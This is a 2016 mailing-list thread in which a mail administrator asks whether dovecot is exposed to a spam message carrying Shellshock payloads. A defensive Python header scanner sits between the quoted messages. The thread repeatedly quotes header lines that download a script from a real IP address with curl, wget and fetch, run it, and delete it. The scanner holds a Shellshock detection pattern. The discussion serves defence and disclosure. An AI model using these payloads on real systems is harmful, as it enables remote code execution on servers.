I found an interesting email that got caught in my spam quarantine. I'm wondering if dovecot is vulnerable to this kind of code execution (I'm aware that other components could be vulnerable, but this question is specifically targeting dovecot).

The idea is to insert shell commands into various header fields that would get executed as part of the message processing/delivery.

Examples include:

From: () {:;};/bin/sh -c 'cd /tmp;curl -sO 62.75.175.145/ex.sh;lwp-download http: //62.75.175.145/ex.sh at nes.txt.com;,
wget at nes.txt.com, 62.75.175.145/ex.sh at nes.txt.com;,
fetch at nes.txt.com, 62.75.175.145/ex.sh at nes.txt.com;, sh at nes.txt.com,
ex.sh at nes.txt.com;, rm at nes.txt.com, -fr at nes.txt.com,
ex.*'@nes.txt.com, &@nes.txt.com;

Subject:() { :; }; /bin/sh -c 'cd /tmp ;curl -sO 62.75.175.145/ex.sh;lwp-download http://62.75.175.145/ex.sh;wget 62.75.175.145/ex.sh;fetch 62.75.175.145/ex.sh;sh ex.sh;rm -fr ex.*' &;

Date:() { :; }; /bin/sh -c 'cd /tmp ;curl -sO 62.75.175.145/ex.sh;lwp-download http://62.75.175.145/ex.sh;wget 62.75.175.145/ex.sh;fetch 62.75.175.145/ex.sh;sh ex.sh;rm -fr ex.*' &;

Message-ID:() { :; }; /bin/sh -c 'cd /tmp ;curl -sO 62.75.175.145/ex.sh;lwp-download http://62.75.175.145/ex.sh;wget 62.75.175.145/ex.sh;fetch 62.75.175.145/ex.sh;sh ex.sh;rm -fr ex.*' &;

The full message, should it be of interest, can be found here:

https://dl.dropboxusercontent.com/u/17066730/interesting%20email.txt

Thank you!
--
Louis Kowolowski louisk at cryptomonkeys.org
Cryptomonkeys: http://www.cryptomonkeys.com/

Making life more interesting for people since 1977
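A defender-side check for the header pattern the post describes, added here as an example; it is not part of the original thread and not dovecot code. It parses a constructed message modelled on the quoted headers (placeholder addresses, not the ones from the original mail) and reports every header field carrying a Shellshock-style "() { ... };" function definition, so such mail can be quarantined before any shell-based processing sees it.

```python
import re
from email import message_from_string

# Shellshock-style function definition: "() {" + body + "};" followed by the
# command to run. Whitespace is optional so both "() {:;};" and "() { :; };"
# as seen in the quoted headers match.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;")

# Header fields the quoted message abused, plus two more that delivery
# agents commonly hand to scripts (operator's choice, not from the thread).
SCANNED_HEADERS = ("From", "Subject", "Date", "Message-ID", "To", "Reply-To")


def scan_headers(raw_message: str) -> dict:
    """Return {header_name: value} for each scanned header whose value carries
    a Shellshock-style function definition. An empty dict means no hit."""
    msg = message_from_string(raw_message)
    hits = {}
    for name in SCANNED_HEADERS:
        # get_all() covers duplicated headers; the parser leaves values raw.
        for value in msg.get_all(name, []):
            if SHELLSHOCK_RE.search(value):
                hits[name] = value
    return hits


# Constructed sample modelled on the quoted mail. 192.0.2.10 (TEST-NET-1) and
# example.invalid are placeholders, not the addresses from the original message.
SAMPLE = (
    "From: () {:;};/bin/sh -c 'cd /tmp;curl -sO 192.0.2.10/ex.sh' @example.invalid\n"
    "Subject: () { :; }; /bin/sh -c 'cd /tmp ;curl -sO 192.0.2.10/ex.sh' &\n"
    "Date: Wed, 27 Jan 2016 21:10:00 +0100\n"
    "Message-ID: <clean-id@example.invalid>\n"
    "To: user@example.invalid\n"
    "\n"
    "body\n"
)

if __name__ == "__main__":
    # Expected: From and Subject are flagged; Date, Message-ID and To are clean.
    for name, value in scan_headers(SAMPLE).items():
        print(f"quarantine: {name}: {value[:40]}...")
```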
On 27.01.2016 at 21:10, Louis Kowolowski wrote:
> I found an interesting email that got caught in my spam quarantine. I'm wondering if dovecot is vulnerable to this kind of code execution (I'm aware that other components could be vulnerable, but this question is specifically targeting dovecot).
>
> The idea is to insert shell commands into various header fields that would get executed as part of the message processing/delivery.
>
> Examples include:
>
> From: () {:;};/bin/sh -c 'cd /tmp;curl -sO 62.75.175.145/ex.sh;lwp-download http: //62.75.175.145/ex.sh at nes.txt.com;,
> wget at nes.txt.com, 62.75.175.145/ex.sh at nes.txt.com;,
> fetch at nes.txt.com, 62.75.175.145/ex.sh at nes.txt.com;, sh at nes.txt.com,
> ex.sh at nes.txt.com;, rm at nes.txt.com, -fr at nes.txt.com,
> ex.*'@nes.txt.com, &@nes.txt.com;
>
> Subject:() { :; }; /bin/sh -c 'cd /tmp ;curl -sO 62.75.175.145/ex.sh;lwp-download http://62.75.175.145/ex.sh;wget 62.75.175.145/ex.sh;fetch 62.75.175.145/ex.sh;sh ex.sh;rm -fr ex.*' &;
>
> Date:() { :; }; /bin/sh -c 'cd /tmp ;curl -sO 62.75.175.145/ex.sh;lwp-download http://62.75.175.145/ex.sh;wget 62.75.175.145/ex.sh;fetch 62.75.175.145/ex.sh;sh ex.sh;rm -fr ex.*' &;
>
> Message-ID:() { :; }; /bin/sh -c 'cd /tmp ;curl -sO 62.75.175.145/ex.sh;lwp-download http://62.75.175.145/ex.sh;wget 62.75.175.145/ex.sh;fetch 62.75.175.145/ex.sh;sh ex.sh;rm -fr ex.*' &;
>
> The full message, should it be of interest, can be found here:
>
> https://dl.dropboxusercontent.com/u/17066730/interesting%20email.txt
>
> Thank you!
> --
> Louis Kowolowski louisk at cryptomonkeys.org
> Cryptomonkeys: http://www.cryptomonkeys.com/
>
> Making life more interesting for people since 1977

Where were you in 2014 when Shellshock was the big buzz?

Alexander
> On Jan 27, 2016, at 1:43 PM, Alexander Dalloz <ad+lists at uni-x.org> wrote:
>
> On 27.01.2016 at 21:10, Louis Kowolowski wrote:
>> I found an interesting email that got caught in my spam quarantine. I'm wondering if dovecot is vulnerable to this kind of code execution (I'm aware that other components could be vulnerable, but this question is specifically targeting dovecot).
>>
>> The idea is to insert shell commands into various header fields that would get executed as part of the message processing/delivery.
>>
>> Examples include:
>>
>> From: () {:;};/bin/sh -c 'cd /tmp;curl -sO 62.75.175.145/ex.sh;lwp-download http: //62.75.175.145/ex.sh at nes.txt.com;,
>> wget at nes.txt.com, 62.75.175.145/ex.sh at nes.txt.com;,
>> fetch at nes.txt.com, 62.75.175.145/ex.sh at nes.txt.com;, sh at nes.txt.com,
>> ex.sh at nes.txt.com;, rm at nes.txt.com, -fr at nes.txt.com,
>> ex.*'@nes.txt.com, &@nes.txt.com;
>>
>> Subject:() { :; }; /bin/sh -c 'cd /tmp ;curl -sO 62.75.175.145/ex.sh;lwp-download http://62.75.175.145/ex.sh;wget 62.75.175.145/ex.sh;fetch 62.75.175.145/ex.sh;sh ex.sh;rm -fr ex.*' &;
>>
>> Date:() { :; }; /bin/sh -c 'cd /tmp ;curl -sO 62.75.175.145/ex.sh;lwp-download http://62.75.175.145/ex.sh;wget 62.75.175.145/ex.sh;fetch 62.75.175.145/ex.sh;sh ex.sh;rm -fr ex.*' &;
>>
>> Message-ID:() { :; }; /bin/sh -c 'cd /tmp ;curl -sO 62.75.175.145/ex.sh;lwp-download http://62.75.175.145/ex.sh;wget 62.75.175.145/ex.sh;fetch 62.75.175.145/ex.sh;sh ex.sh;rm -fr ex.*' &;
>>
>> The full message, should it be of interest, can be found here:
>>
>> https://dl.dropboxusercontent.com/u/17066730/interesting%20email.txt
>>
>> Thank you!
>> --
>> Louis Kowolowski louisk at cryptomonkeys.org
>> Cryptomonkeys: http://www.cryptomonkeys.com/
>>
>> Making life more interesting for people since 1977
>
> Where were you in 2014 when Shellshock was the big buzz?
>

The system in question doesn't have bash, and I'd already verified none of the other components were vulnerable.

When I ran across this, I realized I hadn't checked to ensure dovecot properly escaped things.
--
Louis Kowolowski louisk at cryptomonkeys.org
Cryptomonkeys: http://www.cryptomonkeys.com/

Making life more interesting for people since 1977